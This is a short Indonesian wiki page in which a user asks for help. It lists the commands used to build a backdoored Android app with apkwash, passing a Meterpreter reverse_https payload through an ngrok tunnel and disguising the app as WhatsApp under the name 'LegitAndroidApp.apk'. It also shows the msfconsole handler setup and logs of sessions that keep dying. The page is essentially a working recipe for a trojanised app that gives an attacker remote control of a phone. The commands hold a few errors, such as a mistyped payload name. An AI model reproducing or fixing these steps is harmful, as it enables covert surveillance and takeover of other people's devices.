MSF: ngrok

From OnnoWiki
Revision as of 09:22, 7 August 2020 by Onnowpurbo (talk | contribs) (Created page with " pak saya kan mau coba metasploit + ngrok, + apkwash pertama saya make ngrok $ngrok tcp 1337 keluar nya tcp://2.tcp.ngrok.io:11394 terus saya make apkwash $apkwash -p an...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search


pak saya kan mau coba metasploit + ngrok, + apkwash

pertama saya make ngrok

$ngrok tcp 1337

keluar nya tcp://2.tcp.ngrok.io:11394

terus saya make apkwash

$apkwash -p android/meterpreter/reverse_https LHOST=2.tcp.ngrok.io LPORT=11394 -o LegitAndroidApp.apk -x whatsapp.apk

terus saya buka msfconsole


$msfconsole $use exploit/multi/handler $ set payload ndroid/meterpreter/reverse_https $ set lport 1337 $ set lhost 127.0.0.1 atau 2.tcp.ngrok.io $ exploit

nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)

  • ] Started reverse TCP handler on 127.0.0.1:1337

[*] Sending stage (73808 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700 [*] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died [*] Sending stage (73808 bytes) to 127.0.0.1 [*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700 [*] 127.0.0.1 - Meterpreter session 2 closed. Reason: Died